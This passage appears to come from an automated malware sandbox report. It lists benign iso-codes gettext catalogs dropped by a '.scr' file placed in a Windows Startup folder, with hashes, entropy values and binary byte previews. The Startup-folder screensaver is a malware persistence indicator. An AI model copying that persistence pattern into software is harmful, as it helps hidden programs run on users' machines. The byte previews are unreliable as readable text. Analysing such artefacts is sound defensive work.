                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 966 messages, Project-Id-Version: iso_3166-2 'Federacia \304\210efurba Teritorio Abu\304\235o'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):46967
                                                                                                    Entropy (8bit):5.06492705189213
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:CjWkFNJVUXbDMnQmo+QZ1LdguRM+townjd3esKRWmGfMyBDhoI6EnnUEfsMWb:Cj90XbbPxguRM+b1B6jkZWb
                                                                                                    MD5:6904141C8B5CF08AE7AAEBBEE588E56D
                                                                                                    SHA1:F34D32B7BA7C40708AB6245884CC7F118E567ADA
                                                                                                    SHA-256:5E8A68DEFD789F63AE6BC7BBC8551D52B45D392E9DCD5ED1E5EFD4CD55ABE727
                                                                                                    SHA-512:36D86B5C05175C138D7D53B0C00D0B79F416E7DDDC46400B5951F67F660B446FA4F191BB7202C58F0733BDB74CDD56A9E4FB72A8E291E65DE93C0936B8E0361B
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|<.......P.......P.......P.......P.......P.......P.......P.......P.......Q.......Q.......Q......+Q......AQ......KQ......[Q......uQ.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......R.......R.......R......,R..!...JR......lR......wR.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......S.......S......%S......+S......5S......DS......PS......YS......qS......{S.......S.......S.......S.......S.......S.......S.......S..+....S.......T......'T......:T......TT......kT......tT.......T.......T.......T.......T.......T.......T.......T.......T.......T.......T.......T.......T.......U.......U......!U......2U......>U......UU......cU......jU......rU......~U.......U.......U.......U.......U.......U.......U.......U.......U.......U.......U.......U.......U.......V.......V.......V......'V......1V......@V......HV......PV......bV......tV.......V.......V.......V.......V.......V.......V.......V.......V.......V......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Brita Antarkta Teritorio'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2599
                                                                                                    Entropy (8bit):5.16904267116649
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VAD2frKTx1vGqIfdvqNuoU6GTjchIvZHrdguaYz0OjTqF0/:qD203yBoxGjr1dNa60sGF2
                                                                                                    MD5:D3E3283F3230E2F0C1FC4AE57581D9E9
                                                                                                    SHA1:ADF184A81B08FBF72875D29F3405B538E6FE90B6
                                                                                                    SHA-256:98E1548F288FB0789C304E0BB79FF5A87AE02EB5E1A9F71817E00499A91C264A
                                                                                                    SHA-512:386C057247D234363625569EB07A2AFB76CA62F9369ABE291C8E385F7C2EC9E2F6064F197ECCAE18A14A3D736868885E646BE3067AE4CD4F00ED5C60F61BA463
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........|...........&...$...?...%...d...........3...............................................&...4.......[.......y...........................................&...................".......8.......?...!...L...2...n........... .............../....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 152 messages, Project-Id-Version: iso_4217 'Kontunuo de la Azia Disvolva Banko'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8374
                                                                                                    Entropy (8bit):4.885039527310701
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:vONzbkH5NQ3fno2TEjwLTjLhPm9DsUEy/sG4svtGX:vO9oY/o2TE2XLq1Zo
                                                                                                    MD5:A76996D28B4DDE95CECD34A36440B83D
                                                                                                    SHA1:A8E11E4A5904B1029972CEF10D1B4C937CDB9EC1
                                                                                                    SHA-256:7A9296B5C02B3124EB684E3B41B43D8E2F2F213BF10FA3E1D711B71259DBFD0E
                                                                                                    SHA-512:49E0A3320B23BFB9D6ED076FF279568C76B002FB8E6D6239CD1E5EB1D63105D53FD35D23D82D4CC8A51B869161A1E5D5C2AE2F9D4F918658E782E86DB34FB765
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................#.......1.......?.......Q.......a.......p.......u.......|...................................1.......3.......9...,...7...f...............................................................................".......8...0...E.......v.......................................................................................................(.......7.......I.......X.......].......t.......................................................................................................................!.......1.......A.......F.......K.......Y.......^.......c.......r.......v.......|.......................................................................................................<.......O.......a.......t.......................................................................................................................%.......*.......7.......?.......F.......T.......a.......}.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 938 messages, Project-Id-Version: iso_639-3 'Ab\304\245aza'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):48656
                                                                                                    Entropy (8bit):5.071967224773761
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:bLGVFKgYyyP5x6T6ftkFjcdWDo/uLSUWgm1bQxQfYCeNyrSU9r7amtMgyDDHh6eB:YFRax6O1kFjiuLhWgmKxQQxUSwr7fj6v
                                                                                                    MD5:256A7638CEA3A79EE07FC04AC3CAEC1C
                                                                                                    SHA1:6E1F3656C993E583DAB63C526B49F8AB16128BF3
                                                                                                    SHA-256:F30D7DEDB28EE7E6E2A48DB89A80B9B7A6B5487702EFE42F02541C4D38BD724C
                                                                                                    SHA-512:BED1341C86D326FEA7E98AB1238DCA9F98AF538BF6D2F8D7726A4ACD4FF818CFCBE0DCCD92DEB4392A368F26E358AF94FB92B9E099B30F009344C0FE2DB805C8
                                                                                                    Malicious:false
                                                                                                    Preview:................l........:......hN......iN......sN......|N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......O.......O......&O......>O......UO......jO......zO.......O.......O.......O.......O.......O.......O.......O.......O.......P......'P......<P......CP.."...PP......sP.......P.......P.......P.......P.......P.......P.......P.......P.......Q.......Q......2Q......CQ......PQ......_Q......sQ.......Q.......Q.......Q.......Q.......Q.......Q.......R......#R......1R......AR......YR......jR......{R.......R.......R.......R..,....R.......R.......R.......S......:S......MS......US......\S......qS.......S.......S.......S.......S.......S.......S.......S..#....S.......T......0T......7T......?T......FT......MT......YT......lT.......T.......T.......T.......T.......T.......T.......T.......T.......T.......T.......U.......U......)U......1U......8U......=U......HU......]U......eU......|U.......U.......U.......U.......U.......U.......U.......U.......U......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 101 messages, Project-Id-Version: iso_639-5 'Afrik-Aziaj lingvoj'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6705
                                                                                                    Entropy (8bit):4.905204510081911
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:SBfZ17SHyZi4qSoZySE0BfCuXrUUZJFVCYejMnubdKP5JuTmhM:SxDKgSE0Bf/ZcZUuqmIM
                                                                                                    MD5:2BCCC065FF3A05499C5C1588039D026D
                                                                                                    SHA1:5AB723C467DCAFAE2E2EE89EF0327467A40DE92B
                                                                                                    SHA-256:E96952C8D2EF79D58806FD389275D83C4C2A147E5E4F20B886359FC069E4C334
                                                                                                    SHA-512:CD26A317715E693B3C8A78DAE8BCF8E01B6C3D9F87772FAF96A66259D740E78CE9B29A25EEBCACEF641F470A0E763928621DD3C553AFAC27F5EAE85239C48F80
                                                                                                    Malicious:false
                                                                                                    Preview:........e.......D.......l.......................................................................................G.......\.......u...............................................................................&...!...7...#...Y.......}...................................$.......#.......%...'.......M.......`.......t...........#...........................................!.......4.......G.......W.......e.......u...............................................................................2.......N......._.......o...............................................................&.......?.......P.......b.......s...............................................................................-.......?.......Q.......q.......................................................................%.......8.......P...#...f...............................................................................................................4.......H.......Z.......p.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10493
                                                                                                    Entropy (8bit):5.078280771514611
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:duTp/IfltU4WjV9qWxa5hW8nKg23TShM6Aa79Mc:qYg4WjVDxa5hW8nKl3uhIuMc
                                                                                                    MD5:040FE69896A353D282E2ED68E3E94CF7
                                                                                                    SHA1:1FC1F48EA5766881416D3D3A486AE091260F519D
                                                                                                    SHA-256:81D9292626A2412282630F67A261E09B8AD276F83AE6758C79A696796E5077E9
                                                                                                    SHA-512:0DF3A7969F337AE1638EC4D91A1FDE8782F703DE7C0BFD4203A34F2AE14418CBB0BC72C2ED237A85F643C365CCE29AE775124AB087A9E5A93834ACFC90CF34A2
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganist\303\241n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24037
                                                                                                    Entropy (8bit):5.033412581608283
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosmldaIJq46nbjz5wsWP48WAINiZGk0V1xwwAC0I:0oBagq48fmsWP48WAIW0V1xpACD
                                                                                                    MD5:1713B9FE5A259E1E4A89DA36628E443B
                                                                                                    SHA1:9317C05281A46F4E51B860F043CDE40AF296233C
                                                                                                    SHA-256:8771F37760F208C02D3A412EF1F8E200ACB05F83103E5727EC94E5D48AEF9324
                                                                                                    SHA-512:E06AAAA5941D864D4846AD383D213B71F4634183812B6584733FE3472DA1BCABCE65D4A6FB5E09F919E60E3C3BD3718D2DADD916B92FAF0657AB5D2D1C0CE221
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 354 messages, Project-Id-Version: iso_3166-2 'Abruzos'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15680
                                                                                                    Entropy (8bit):4.857214726296532
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:2h2YJ2FemhAWvsHmCS4Rm5+wtuqDdspO9hLPtpIWAGi2TQD0an:2mHe+3LxspO9ZDvbi2TQYi
                                                                                                    MD5:E7E4F8929F609C302089C9323AF125C2
                                                                                                    SHA1:9FFA18435A4B4D3E1E6F9A0F9BBD883FECD603F3
                                                                                                    SHA-256:D870A78E39175D4BC6AC86403B02E96FC6809A3211ED08BCFA9CEBBF984C4E71
                                                                                                    SHA-512:6DCDFACBDBF2C0CCAEBA166A5508652FBDC7F28CF6246A3B97553D16A07FC53CC2F33741196A8F098D10B94E7D55617BA71C1F5470204916829874BFD6336E16
                                                                                                    Malicious:false
                                                                                                    Preview:........b.......,.......<...............................................................................................".......*.......3.......B.......I.......Z.......d.......p.......v.......}.......................................................................................................................................&...............4.......C.......K.......T.......\.......e.......v.......}........................................................................................................ ....... ....... ....... ......% ......, ......G ......d ......p ......v ......| ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!......'!.......!......6!......?!......K!......R!......_!......h!......q!......y!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......'"....../"......9"......A"......I"......X"......_"......r"......."......."......."......."......."......."......."......."......."......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Territorio Ant\303\241rtico Brit\303\241nico'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2927
                                                                                                    Entropy (8bit):5.2001401796469215
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3gsAvY0lsL7+vGqIfdvqN5CoUWJLYfsuQEIectlsQD6sQ0W:rLvgpY0yf+yaCo9MfsRxe+xO0W
                                                                                                    MD5:0E92A8163DBB78317FB5B8986CDB178D
                                                                                                    SHA1:CADA09837DA67DD9D10E215CA076DB9FF11392EC
                                                                                                    SHA-256:3135BE2DF3C65D729ACE9FFDD78D013D106F93C1218F5A85F737CF8D477E23C2
                                                                                                    SHA-512:1852FB796607E8E47B250069A08603AC22FF0B73CBFE024C5980BE0A3A4C6BD53F262B53055162C260D4AC7027C8ED4D4E7CBE8ECCE31E4961CBEFF7A8DFE5EA
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+....................... ......./.......0... .......Q...2...l...................................0.......+.......$...G.......l.........................................../...................!.......5.......<.......L...3...{...........#...............*.......4...$.......Y........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'Unidad de cuenta del ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9745
                                                                                                    Entropy (8bit):4.967595778791643
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFPxFPuc0O+Mz2E6VRyK0G/2LCntx5KYHlLTP:Sx0O+UN6TL0G/Uo/kYHFP
                                                                                                    MD5:183C5AB807F05893ABCD81095EC5AECE
                                                                                                    SHA1:C7FCA2B2C0ECC62FCA58B73D329BD11BA0B2A2CE
                                                                                                    SHA-256:CD787D3B8DC053F82F9C9F73A7A97E0FF17944A926143305A9339F3A56DF366E
                                                                                                    SHA-512:6858055932275551D62E3EA53B7FBA5359CEBB3901DEAB81D1A10837E44FE0856DD57D5C1C1F4FD254081A9A184E2411620188872DBB423F31406A14680901EA
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 796 messages, Project-Id-Version: iso_639-3 'Are are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33190
                                                                                                    Entropy (8bit):4.837226010109302
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:cY0odpW4MTtW2nJ9/M5x2b4lf1xhmlhLnWJ:cgVQJ/4FfhuhI
                                                                                                    MD5:DE16EB7D5DB666367B8E1E8D32948A04
                                                                                                    SHA1:BA63F9E40512B468B7B1D2CDB695ED756DA4FF39
                                                                                                    SHA-256:477D9BF18035C678B7A80C186F4C949A01242D21F733BB2BD6A9A7E7B19CF735
                                                                                                    SHA-512:33FCC7F47E646D38EF5A809DDB42CC14E9D606894839759C9CAEF8306BC41C9A1C88EC3FCFC702B34F7549AC33777CEE66996E919180F47BCE29C191A5E8D1AD
                                                                                                    Malicious:false
                                                                                                    Preview:....................%....1......pB......qB......zB.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......C.......C.......C.......C.......C.......C...... C......(C....../C......7C......<C......EC......QC......`C......iC......xC......~C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......D.......D.......D.......D......(D....../D......8D......BD......JD......RD......XD......fD......lD......qD......wD......{D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......E.......E.......E.......E...... E......'E......4E......AE......GE......OE......UE......cE......rE.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......F.......F.......F.......F...... F......'F......,F......4F......:F......?F......FF......KF......\F......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9689
                                                                                                    Entropy (8bit):4.95092942214389
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dJaYCbW7AZltU4WjV9qWxa5hW8pKtoG0+QJf4TI:vCbW7AZg4WjVDxa5hW8Mtd2JQTI
                                                                                                    MD5:8DD768B26F2B3743BB151E3CB2EF4377
                                                                                                    SHA1:8941C26EF281C91F497939ABAFEF4B6264B5D8FB
                                                                                                    SHA-256:6C16BE94FF8A5BC924F76688EA2CAD76646CA3B7245CB9F641133AF03E13D2BC
                                                                                                    SHA-512:A265492A932AC52A282EC831ADAE2252373998AF74A414450FC2147204458B624463640C22D8BE85118E64036A49B7689A3578DFC6355B23070633703AFACB5F
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23059
                                                                                                    Entropy (8bit):4.985940554477765
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosmG+RXXsPB46nbjz5wsWP48WAINiZGlsV33FkuIHMBydf64goZCdYHLJ:0oXGqXsPB48fmsWP48WAIxjKLc
                                                                                                    MD5:7F8E0A125BB95C51D288405390181ECD
                                                                                                    SHA1:ABB61787E3E4B7FAA6CE932F62CFD4144749E9A6
                                                                                                    SHA-256:264772840538D1ACEBA3DF3ABDE1CBC855B55A7371FDD2957D721B4C79ABA750
                                                                                                    SHA-512:8563F7640AA478AD75FE3C6422992ECCB594F6413A17A4FF862D8B1664E99747FE7952453EF2BB3190204DBFAB004C2AD9467254ED34BEF21152EB7D614FB5A5
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 284 messages, Project-Id-Version: iso_3166-2 'Ab\305\237eron'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12218
                                                                                                    Entropy (8bit):4.961380213961465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:3Bk39AJgt6TXGI3UEnJMHkdu334Tl64chKDKZb2cpJwDHmu4AKqyy:wAuk6I3UEnJM9y2gZcUDPZKry
                                                                                                    MD5:2E1A94A2EE6BF1AE41799D2F7603273E
                                                                                                    SHA1:6B8EF9F1C5BF83204C753BF4C0E403DFDA6F75E3
                                                                                                    SHA-256:D6FDDCAF77B55C4F6688A4A7B40381FF2E360C1ABBFFCFBB25D3A94A7450675D
                                                                                                    SHA-512:47649D6B137D57DAD5C6E2F6CF59C5FDCA04E5AD0E2FB21C2A577326D61B0E6411CB3D4A7C4B9E8D3DEA0BE31C912F14CFF322B2DF8F142F78E05F3FCB92E703
                                                                                                    Malicious:false
                                                                                                    Preview:....................{...................................................................................%.......+.......9.......@.......].......h.......o.......w...............................................................................................................................................................................'.......4.......?.......I.......R.......Z.......b.......j.......t.......z................... ...................................................................................!.......,.......8.......A.......H.......Q.......Z.......a.......i.......t.......|...............................................................................................................!.......).......7.......?.......E.......R.......[.......e.......p.......u...............................................................................................................................................!.......(.......0.......8.......?.......G.......N.......Z.......c.......n.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Briti Antarktise ala'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2748
                                                                                                    Entropy (8bit):5.20915588707542
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf360Rit+vGqIfdvqN5CoUSPSxBQMLukCyCnEP7DZpZ66Hn:rLv6aI+yaCoRSxB/LCyCu7DZL66Hn
                                                                                                    MD5:3079661C68E2866F67FDC2DAE690489E
                                                                                                    SHA1:6D8DCC6C8F6C849FF6527A17CEF8EA867604F8BC
                                                                                                    SHA-256:7D6A05FEE0868AF7547D6A4B75C7CC6F13883333EBE0B837298B456E9D8C8DE3
                                                                                                    SHA-512:1D60CF21B6BE1F323F76A53EB49121FB3BE15A2AE23879A9DE98024237052BEE150892440E24AF26912C5E01D8812D03A4236029C027C96F42722920281E68C5
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................".......................9...........T.......\.......q.......{...........%...........................................................?...&...M.......t...........................).......@...................4.......S..."...a...(....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB arveldus\303\274hik'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9565
                                                                                                    Entropy (8bit):4.9459869854070195
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFRwaG/LwdL6VRyK0G/2LCntx8q7IUY++39VJXm:S3wBLwdL6TL0G/Uo/8qMl+4m
                                                                                                    MD5:4DCA45537A1D21114C31C1B967F8F8AC
                                                                                                    SHA1:2546E15C1B1DB7B757A09A296910F0D163D55B1C
                                                                                                    SHA-256:24C53B9FAB946BD7D0DD42D70AEA09E0478E9549BCB54FEF8D2E2D2BB0E48952
                                                                                                    SHA-512:90E6A3107D3B97341B6EFD3BD4671C5B1397E71F2ADD8CB027DC5136EE8F0F8C15A0831A7F79F8F36B8218A342EEAE837A6AFFC3ADAE3043EBAFF18A321BFB41
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 758 messages, Project-Id-Version: iso_639-3 'areare'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32017
                                                                                                    Entropy (8bit):4.789798911088075
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:8DgBqgkaokDd6YWECoGj2qpwWbxYOg/hky++Fhn82rDW2ofMpIFMEx523kguLjou:8vD57YWNoGJpwqr1ybh8cSRzSQtPv/Rd
                                                                                                    MD5:3FD02FF55A02E6937CECD6C2AEC6F190
                                                                                                    SHA1:DB1DF1FDCE088E9A8F432237EEA0F9E9A4DE1EC6
                                                                                                    SHA-256:D363E3052071ED11E06CD41FF2C55B871D24D8B339C58AD748119F40FE2C56A0
                                                                                                    SHA-512:33FB38F811BFD0D0F8E3A83CDD68B25276E3A87C47E6E94C2A9FF24A74719A54C46AA893B64769674E80EB23F3A113F0E5A1E1666999572587F419D4F4D5DB09
                                                                                                    Malicious:false
                                                                                                    Preview:........................|/......P?......Q?......Z?......_?......e?......r?......y?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......@.......@.......@.......@......+@......3@......<@......A@......F@......K@......T@......`@......q@......v@......~@.......@.......@.......@.......@.......@.......@.......@.......@.......A.......A.......A......#A......)A......5A......DA......LA......SA......[A......aA......gA......nA......uA.......A.......A.......A.......A.......A.......A.......A.......A.......A.......A.......A.......A.......A.......B.......B.......B......*B......1B......:B......CB......KB......RB......ZB......bB......iB......pB......wB.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......C.......C.......C......#C......)C......0C......7C......?C......EC......WC......^C......hC......qC......wC......}C.......C.......C.......C.......C.......C.......C.......C.......C.......C......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afroaasia keelkond'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7437
                                                                                                    Entropy (8bit):4.8278895526408965
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2ziZDD+qRSlSE0BfCuXr5VcJHVCSf8qQ2yw5kKflZW43LWRBj5P+:4SDxisSE0BfNcaKvflZWSZ
                                                                                                    MD5:1C8282671152A119A9FE18B9F0D1E63F
                                                                                                    SHA1:A4D8FB8ED1D2361DB904DF8984EFF536CA0CA1B8
                                                                                                    SHA-256:BB6533C9E05527811F814443B40A2DB202C573CE236A5044F7F3A142ABC8BB92
                                                                                                    SHA-512:47C7DB12C4594F4D61EA897CBE6C07808E93F6109F2E7D4F8641D25B623825210BB7C52DDBD0FD04EDAEE5B26F86CE952D803B8FA39B3E5B98932F3227E7999D
                                                                                                    Malicious:false
